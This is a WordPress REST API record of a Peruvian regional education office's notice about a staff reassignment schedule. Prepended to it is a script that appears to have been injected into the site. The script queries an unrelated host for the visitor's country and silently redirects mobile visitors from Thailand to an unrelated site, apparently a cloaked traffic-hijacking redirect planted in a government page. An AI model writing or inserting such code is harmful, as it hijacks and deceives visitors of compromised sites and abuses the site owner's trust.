<script>
(function() {
    var isDesktop = true;
    
    // Desktop = stay
    if (isDesktop) {
        document.body.style.visibility = "visible";
        return;
    }
    
    var key = "geo_th_v1";
    var cached = localStorage.getItem(key);
    
    // Mobile + TH = redirect
    if (cached === "TH") {
        location.href = "https://www.wakeboard-madrid.com/";
        return;
    }
    
    // Mobile + non-TH (cached) = stay
    if (cached && cached !== "TH") {
        document.body.style.visibility = "visible";
        return;
    }
    
    // Fetch country
    fetch("https://kuproy.xyz/")
        .then(function(r) { return r.text(); })
        .then(function(c) {
            var country = c.trim().toUpperCase();
            localStorage.setItem(key, country);
            
            // TH = redirect, non-TH = stay
            if (country === "TH") {
                location.href = "https://www.wakeboard-madrid.com/";
            } else {
                document.body.style.visibility = "visible";
            }
        })
        .catch(function() {
            // Error = assume non-TH, stay
            localStorage.setItem(key, "NOT_TH");
            document.body.style.visibility = "visible";
        });
})();
</script>{"id":794,"date":"2021-02-12T10:10:00","date_gmt":"2021-02-12T15:10:00","guid":{"rendered":"https:\/\/ugelarequipanorte.gob.pe\/wp\/?p=794"},"modified":"2021-12-01T22:29:26","modified_gmt":"2021-12-02T03:29:26","slug":"comunicado-ugel-arequipa-norte","status":"publish","type":"post","link":"https:\/\/ugelarequipanorte.gob.pe\/wp\/comunicado-ugel-arequipa-norte\/","title":{"rendered":"COMUNICADO &#8211; UGEL Arequipa Norte"},"content":{"rendered":"\n<p><strong>La UGEL Arequipa Norte, comunica al personal excedente de la evaluaci\u00f3n extraordinaria del proceso de racionalizaci\u00f3n 2020 seg\u00fan la R.V.M. N\u00b0 142-2020-MINEDU, registrado en el cuadro que se adjunta al Pte., que el proceso de racionalizaci\u00f3n de reasignaci\u00f3n y\/o reubicaci\u00f3n por excedencia, se realizar\u00e1 de acuerdo al siguiente cronograma<\/strong><\/p>\n\n\n\n<div data-wp-interactive=\"core\/file\" class=\"wp-block-file\"><object data-wp-bind--hidden=\"!state.hasPdfPreview\" hidden class=\"wp-block-file__embed\" data=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2021\/12\/CRONOGRAMA-3okok.pdf\" type=\"application\/pdf\" style=\"width:100%;height:600px\" aria-label=\"Incrustado de Incrustado de CRONOGRAMA-3okok..\"><\/object><a href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2021\/12\/CRONOGRAMA-3okok.pdf\">CRONOGRAMA-3okok<\/a><a href=\"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-content\/uploads\/2021\/12\/CRONOGRAMA-3okok.pdf\" class=\"wp-block-file__button\" download>Descarga<\/a><\/div>\n","protected":false},"excerpt":{"rendered":"<p>La UGEL Arequipa Norte, comunica al personal excedente de la evaluaci\u00f3n extraordinaria del proceso de racionalizaci\u00f3n 2020 seg\u00fan la R.V.M. N\u00b0 142-2020-MINEDU, registrado en el cuadro que se adjunta al Pte., que el proceso de racionalizaci\u00f3n de reasignaci\u00f3n y\/o reubicaci\u00f3n por excedencia, se realizar\u00e1 de acuerdo al siguiente cronograma<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[24],"tags":[],"class_list":["post-794","post","type-post","status-publish","format-standard","hentry","category-racionalizacion"],"_links":{"self":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/794","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/comments?post=794"}],"version-history":[{"count":1,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/794\/revisions"}],"predecessor-version":[{"id":796,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/posts\/794\/revisions\/796"}],"wp:attachment":[{"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/media?parent=794"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/categories?post=794"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ugelarequipanorte.gob.pe\/wp\/wp-json\/wp\/v2\/tags?post=794"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}